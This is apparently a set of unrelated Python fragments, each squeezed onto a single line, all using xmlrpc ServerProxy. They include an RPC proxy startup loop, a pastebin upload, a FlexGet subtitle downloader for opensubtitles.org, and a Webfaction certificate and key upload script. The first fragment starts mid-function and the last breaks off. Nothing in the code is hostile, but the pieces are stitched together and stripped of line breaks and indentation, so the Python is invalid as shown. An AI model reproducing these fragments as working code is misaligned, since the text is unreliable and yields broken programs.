kwargs['stdout'] = PIPE kwargs['stderr'] = PIPE self._process = Popen(args, **kwargs) # this starts the client side # it creates a proxy for the server # and tries to connect the proxy to the actual server server = ServerProxy(self.address) print("Starting a new proxy server...") success = False attempt_count = 0 while attempt_count < self.max_conn_attempts: try: server.ping() except Exception: time.sleep(0.1) attempt_count += 1 print(" {} attempts left.".format(self.max_conn_attempts - attempt_count)) else: success = True break if not success: raise RPCServerError("The server is not available.") else: print("New proxy server started.") return server
def paste(self, lodgeit_url): """Create a paste and return the paste id.""" from xmlrpclib import ServerProxy srv = ServerProxy('%sxmlrpc/' % lodgeit_url) return srv.pastes.newPaste('pytb', self.plaintext)
def on_task_download(self, task, config): # filter all entries that have IMDB ID set try: entries = [e for e in task.accepted if e['imdb_id'] is not None] except KeyError: # No imdb urls on this task, skip it # TODO: should do lookup via imdb_lookup plugin? return try: s = ServerProxy("http://api.opensubtitles.org/xml-rpc") res = s.LogIn("", "", "en", "FlexGet") except: log.warning('Error connecting to opensubtitles.org') return if res['status'] != '200 OK': raise Exception( "Login to opensubtitles.org XML-RPC interface failed") config = self.prepare_config(config, task) token = res['token'] # configuration languages = config['languages'] min_sub_rating = config['min_sub_rating'] match_limit = config[ 'match_limit'] # no need to change this, but it should be configurable # loop through the entries for entry in entries: imdbid = entry.get('imdb_id') if not imdbid: log.debug('no match for %s' % entry['title']) continue query = [] for language in languages: query.append({'sublanguageid': language, 'imdbid': imdbid}) subtitles = s.SearchSubtitles(token, query) subtitles = subtitles['data'] # nothing found -> continue if not subtitles: continue # filter bad subs subtitles = [x for x in subtitles if x['SubBad'] == '0'] # some quality required (0.0 == not reviewed) subtitles = [ x for x in subtitles if float(x['SubRating']) >= min_sub_rating or float(x['SubRating']) == 0.0 ] filtered_subs = [] # find the best rated subs for each language for language in languages: langsubs = [ x for x in subtitles if x['SubLanguageID'] == language ] # did we find any subs for this language? if langsubs: def seqmatch(subfile): s = difflib.SequenceMatcher(lambda x: x in " ._", entry['title'], subfile) #print "matching: ", entry['title'], subfile, s.ratio() return s.ratio() > match_limit # filter only those that have matching release names langsubs = [ x for x in subtitles if seqmatch(x['MovieReleaseName']) ] if langsubs: # find the best one by SubRating langsubs.sort(key=lambda x: float(x['SubRating'])) langsubs.reverse() filtered_subs.append(langsubs[0]) # download for sub in filtered_subs: log.debug('SUBS FOUND: ', sub['MovieReleaseName'], sub['SubRating'], sub['SubLanguageID']) f = urlopener(sub['ZipDownloadLink'], log) subfilename = re.match( '^attachment; filename="(.*)"$', f.info()['content-disposition']).group(1) outfile = os.path.join(config['output'], subfilename) fp = file(outfile, 'w') fp.write(f.read()) fp.close() f.close() s.LogOut(token)
def temp(x=1,y=1): s2 = ServerProxy("http://192.168.2.153:49000") s2.StartMonitor(x,y)
def remoteList(self, remote_url): #print 'get remotelist' s = ServerProxy(remote_url) return s.list()
def __init__(self, srvUrl, devKey): self.server = ServerProxy(srvUrl, verbose=False) self.devKey = devKey
domain_cert, pv_key, intermediate_cert = '', '', '' # Directory declarations in order to know where to work valid_cert_dir = '{home}/{acme}/{domain}'.\ format(home=environ.get('HOME'), acme=HIDDEN_ACME_DIR_NAME, domain=d.get('domain')) # Change directory to the one that matches our domain chdir(valid_cert_dir) # Test if current working directory is the valid one try: assert getcwd() == valid_cert_dir except AssertionError: exit('Current working directory is not {}! Instead is {}.'.format(valid_cert_dir, getcwd())) # try to connect to Webfaction API try: server = ServerProxy(d.get('url')) session_id, _ = server.login(d.get('user'), d.get('pwd'), d.get('s_name'), d.get('version')) except Fault as e: exit("Exception occurred at connection with Webfaction's API. {}".format(e)) else: # Connection is successful. Proceed... # read domain certificate and store it as a variable domain_cert = data_to_var('{}.cer'.format(d.get('domain'))) # read private key certificate and store it as a variable pv_key = data_to_var('{}.key'.format(d.get('domain'))) # read intermediate certificate and store it as a variable intermediate_cert = data_to_var('ca.cer')